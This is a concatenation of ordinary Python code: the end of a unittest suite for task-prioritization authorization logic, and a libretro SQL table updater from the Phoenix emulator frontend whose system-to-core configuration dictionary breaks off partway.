self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_user_unauthd_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# note that this situation shouldn't happen anyways. a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_user_not_authd_for_prioritizebefore_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# note that this situation shouldn't happen anyways. a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_before_from_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_remove_prioritize_before_when_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
class TaskPrioritizeAfterLogicLayerTest(unittest.TestCase):
def setUp(self):
self.ll = generate_ll()
self.pl = self.ll.pl
def test_add_prioritize_after_adds_prioritize_after(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# when
results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_already_added_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
t1.prioritize_after.append(t2)
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# when
results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_user_not_authorized_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_user_not_authorized_for_prioritize_after_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_prioritize_after_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
def test_remove_prioritize_after_removes_prioritize_after(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# when
results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_prioritize_after_already_removed_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# when
results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_remove_prioritize_after_with_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_prioritize_after_with_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_rem_prioritize_after_user_unauthd_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# note that this situation shouldn't happen anyways. a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_user_not_authd_for_prioritize_after_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# note that this situation shouldn't happen anyways. a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_prioritize_after_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_after_from_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_remove_prioritize_after_when_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
|
team-phoenix/Phoenix
|
frontend/python/updaters/sqlTableUpdater.py
|
import os
from collections import OrderedDict
from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo
# Root class that all SQL table updaters derive from
class SqlTableUpdater():
def __init__(self, tableName, tableColumns=[], coreInfo={}):
self.tableName = tableName
self.columnsDict = OrderedDict(tableColumns)
self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
self.dbFileExists = os.path.isfile(self.dbFile)
self.coreInfo = coreInfo
# self.filterUnusedCores()
def updateTable(self):
pass
def updateColumns(self, database, additionalStatement: str = ""):
if not self.dbFileExists:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
else:
try:
database.deleteTable(self.tableName)
except:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
def __del__(self):
print("Updated " + self.tableName + " table.")
def libretroSystemList(self):
systems = []
for k, v in self.coreInfo['cores'].items():
if "categories" not in v or v["categories"] != "Emulator":
continue
if "database" in v:
name = v["database"].split("|")
for n in name:
systems.append(n)
# Split console and manufacturer names
# Not really necessary for Libretro identifiers
#tup = n.split(" - ")
#
## "MAME"
#if len(tup) == 1:
# systems.append(tup[0])
#
## Nearly every one
#elif len(tup) == 2:
# systems.append(tup[1])
#
## Sega - Master System - Mark III
## Sega - Mega Drive - Genesis
#elif len(tup) == 3:
# systems.append(tup[1])
# There are some cores that do not have "database" defined
elif "systemname" in v:
systems.append(v["systemname"])
systems = list(set(systems))
systems.sort()
return systems
# This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
# TODO: Place this information into an entirely separate database
# WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
phoenixSystemDatabase = {
# friendlyName: North American console name without manufacturer
# shortName: Abbreviation (typically 3 letters)
# enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)
# Everything else
"Arcade": {"enabled": False, "defaultCore": "mame_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
# Conspicuously missing from No-Intro
"Amstrad - CPC": {"enabled": False, "defaultCore": "cap32_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Amstrad" },
"Atari - 2600": {"enabled": True, "defaultCore": "stella_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Capcom - CP System I": {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System II": {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System III": {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CPS Changer": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"CHIP-8": {"enabled": False, "defaultCore": "emux_chip8_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"DOS": {"enabled": False, "defaultCore": "dosbox_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Mattel - Intellivision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Nintendo - Game & Watch": {"enabled": False, "defaultCore": "gw_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sinclair - ZX81": {"enabled": False, "defaultCore": "81_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
# No-Intro, both official and non-official (ROM-based games)
"Atari - 5200": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - 7800": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Jaguar": {"enabled": True, "defaultCore": "virtualjaguar_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Lynx": {"enabled": True, "defaultCore": "mednafen_lynx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - ST": {"enabled": True, "defaultCore": "hatari_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Bandai - WonderSwan Color": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai - WonderSwan": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Casio - Loopy": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Casio - PV-1000": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Coleco - ColecoVision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Coleco" },
#"Commodore - 64 (PP)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
#"Commodore - 64 (Tapes)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - 64": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga": {"enabled": True, "defaultCore": "puae_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Plus-4": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - VIC-20": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Emerson - Arcadia 2001": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Emerson" },
"Entex - Adventure Vision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Entex" },
"Epoch - Super Cassette Vision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Epoch" },
"Fairchild - Channel F": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Fairchild" },
"Funtech - Super Acan": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Funtech" },
"GamePark - GP32": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "GamePark" },
"GCE - Vectrex": {"enabled": True, "defaultCore": "vecx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "GCE" },
"Hartung - Game Master": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Hartung" },
"LeapFrog - Leapster Learning Game System": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "LeapFrog" },
"Magnavox - Odyssey2": {"enabled": False, "defaultCore": "o2em_libretro", "friendlyName": u"Odyssey²", "shortName": "", "manufacturer": "Magnavox" },
"Microsoft - MSX 2": {"enabled": False, "defaultCore": "bluemsx_libretro", "friendlyName": "MSX2", "shortName": "", "manufacturer": "Microsoft" },
"Microsoft - MSX": {"enabled": False, "defaultCore": "bluemsx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (Games on Demand)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
#"Microsoft - XBOX 360 (Title Updates)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"NEC - PC Engine - TurboGrafx 16": {"enabled": True, "defaultCore": "mednafen_pce_fast_libretro", "friendlyName": "TurboGrafx 16", "shortName": "", "manufacturer": "NEC" },
"NEC - Super Grafx": {"enabled": True, "defaultCore": "mednafen_supergrafx_libretro", "friendlyName": "SuperGrafx", "shortName": "", "manufacturer": "NEC" },
#"Nintendo - Famicom Disk System": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Advance (e-Cards)": {"enabled": True, "defaultCore": "vbam_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Advance": {"enabled": True, "defaultCore": "vbam_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy Color": {"enabled": True, "defaultCore": "gambatte_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Game Boy": {"enabled": True, "defaultCore": "gambatte_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - New Nintendo 3DS (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - New Nintendo 3DS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo 3DS (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo 3DS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo 64": {"enabled": True, "defaultCore": "mupen64plus_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo DS (Download Play) (BETA)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo DS": {"enabled": True, "defaultCore": "desmume_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo DSi (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo DSi": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Nintendo Entertainment System": {"enabled": True, "defaultCore": "fceumm_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
#"Nintendo - Nintendo Wii (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Pokemon Mini": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Satellaview": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Sufami Turbo": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Super Nintendo Entertainment System": {"enabled": True, "defaultCore": "bsnes_mercury_balanced_libretro", "friendlyName": "Super Nintendo", "shortName": "", "manufacturer": "Nintendo" },
"Nintendo - Virtual Boy": {"enabled": True, "defaultCore": "mednafen_vb_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Nokia - N-Gage": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nokia" },
"Philips - Videopac+": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Philips" },
"RCA - Studio II": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "RCA" },
"Sega - 32X": {"enabled": True, "defaultCore": "picodrive_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Game Gear": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Master System - Mark III": {"enabled": False, "defaultCore": "emux_sms_libretro", "friendlyName": "Master System", "shortName": "", "manufacturer": "Sega" },
"Sega - Mega Drive - Genesis": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "Genesis", "shortName": "", "manufacturer": "Sega" },
"Sega - PICO": {"enabled": True, "defaultCore": "picodrive_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
